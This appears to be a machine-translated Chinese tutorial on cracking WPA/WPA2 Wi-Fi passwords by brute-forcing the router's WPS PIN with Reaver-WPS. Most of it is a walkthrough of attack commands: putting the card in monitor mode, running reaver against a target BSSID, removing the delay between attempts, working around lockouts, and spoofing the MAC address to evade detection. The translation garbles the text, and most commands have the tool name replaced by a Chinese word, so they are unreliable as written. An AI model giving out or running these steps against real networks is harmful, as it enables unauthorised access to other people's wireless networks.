破解WPA WIFI / WPA2密码使用没有单词列表的掠夺者
Reaver-WPS对接入点的WiFi引脚号执行暴力攻击。找到 WPS 引脚后,可以检索 WPA PSK,或者可以重新配置无线 AP 设置。在网络安全和道德黑客课程老师的帮助下,我们描述了使用Reaver-WPS帮助破解WPA Wifi / WPA2密码的步骤和命令。 Reaver-wps 重点介绍受 Wi-Fi 保护的配置规范所需的外部日志记录功能。接入点将为经过身份验证的注册商提供其当前无线配置(包括 WPA PSK),并接受新的注册商配置。 为了验证为注册商,注册商必须证明知道 AP 的 8 位 PIN 码。注册商将能够随时向接入点进行身份验证,而无需用户交互。由于WPS协议是通过EAP执行的,因此记录器只需与AP关联,并且不需要任何加密或无线配置的先验知识,因此解释了网络安全和道德黑客课程教授。 Reaver-WPS 对 AP 执行暴力攻击,尝试所有可能的组合以猜测 AP 的 8 位 PIN 码。 由于引脚数是全数字的,因此任何给定的引脚编号都有 10^8 (100,000,000) 个可能的值。根据道德黑客专家的说法,引脚的最后一位数字是一个校验和值,可以根据前 7 位数字计算,这会将密钥空间减少到 10^7 (10,000,000) 个可能的值。 影响网络安全的另一个因素是密钥的长度。由于 WPS 身份验证协议在中间切断引脚并验证每个单独的媒体,因此密钥长度进一步缩短。这意味着引脚的前半部分有 10^4 (10,000) 个可能的值,引脚的后半部分有 10^3 (1000) 个可能的值,引脚的最后一位数字是校验和。 Reaver-WPS 猜测引脚的前半部分,然后猜测引脚的后半部分,这意味着 WPS PIN 号的整个密钥长度可以在 11,000 次尝试中耗尽。据统计,您只有一半的时间来猜测正确的PIN码。让我们看看如何在网络安全和道德黑客课程教师的帮助下配置和安装 Reaver-WPS。 安装: 安装Linux Wifislax,全部建立在它之上。(Reaver-WPS, libpcap and libsqlite3) 用: 通常,Reaver-WPS 所需的唯一参数是目标 AP 的接口名称和 BSSID: # 掠夺者 -i mon0 -b 00:01:02:03:04:05
目标AP的信道和SSID将由Reaver-WPS自动识别,除非在命令行上明确指定:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -c 11 -e 链接
默认情况下,如果接入点更改信道,Reaver-WPS 也会相应地更改其信道。但是,可以通过修复界面的通道来禁用此功能 道德黑客专家解释: # 掠夺者 -i mon0 -b 00:01:02:03:04:05 –固定
默认超时接收为 5 秒。如有必要,可以手动调整此超时期限。
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -t 2
引脚尝试之间的默认延迟周期为 1 秒。此值可以增大或减小到任何非负整数值。值为零表示没有延迟:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -d 0 当检测到“可疑”活动时,某些AP会暂时阻止其WPS状态,通常为五分钟或更短时间。默认情况下,当检测到锁定状态时,Reaver-WPS 将每 315 秒检查一次状态,并且在 WPS 状态解锁之前不会继续对引脚进行暴力攻击。根据网络安全和道德黑客课程教授的说法,此检查可以增加或减少到任何非负值: # 掠夺者 -i mon0 -b 00:01:02:03:04:05 –锁定延迟=250
对于其他结果,可以提供详细选项。提供两次谓词将增加详细程度,并在尝试时显示引脚的每个数字:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -vv
接收 M5 和 M7 WPS 响应消息的默认超时期限为 .1 秒。如有必要,可以手动调整此超时期限(最大超时为 1 秒):
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -T .5
尽管大多数AP并不关心,但发送EAP FAIL消息以关闭WPS会话。默认情况下,此功能处于禁用状态,但可以为需要它的 AP 启用此功能:
# reaver -i mon0 -b 00:01:02:03:04:05 –EAP-终止
首先,确保您的无线网卡处于监控模式:
# airmon-ng 启动 WLAN0
要运行 Reaver,您需要在监控模式下指定目标 AP 的 BSSID 和接口名称(通常是“mon0”,而不是“wlan0”,尽管这可能因无线网卡/驱动程序而异):
# 掠夺者 -i mon0 -b 00:01:02:03:04:05
您可能还希望使用 -vv 获取有关 Reaver 进度的详细信息:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -vv
加速攻击
默认情况下,Reaver-WPS 在引脚尝试之间有 1 秒的延迟。您可以通过在命令行上添加“-d 0”来禁用此延迟,但某些 AP 可能不喜欢教授提到的网络安全和道德黑客课程:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -vv -d 0
另一个可以加速攻击的选项是 -dh-small。此选项指示 Reaver 使用一个小的秘密 diffie-Hellman 数,以减少目标 AP 上的计算负载:
# 掠夺者 -i mon0 -b 00:01:02:03:04:05 -vv –dh-small
MAC 模拟
在某些情况下,您可能希望/需要欺骗您的 MAC 地址。Reaver 使用 -mac 选项支持 MAC 模拟,但您必须确保已正确欺骗 MAC 才能使其正常工作。
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng 启动 WLAN0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69
支持的
无线驱动程序 以下无线驱动程序已经过测试或报告可与 Reaver-WPS 成功配合使用:
阿斯9K RTL8187 卡尔19170 IPW2000 RT2800PCI RT73USB 仅部分 以下无线控制器相对成功,根据您的无线网卡可能会也可能不会工作 阿斯5K 伊拉根 RTL2800USB B43 结论 如果您想Pentest或破解您的Wifi密码,那么首先需要的是兼容的Wi-Fi卡。在网络安全和道德黑客课程中,您将有机会学习如何PenTest或破解Wifi密码,如何注入,欺骗,设置假AP或蜜罐
此捋夺者,wifislax3.3镜像文件里以集成。 发现ruili 网卡缺少注入mon ,所以小伙伴们还是买7610 或7612 免驱并且监听注入都很稳并且支持官方驱动kali linux
|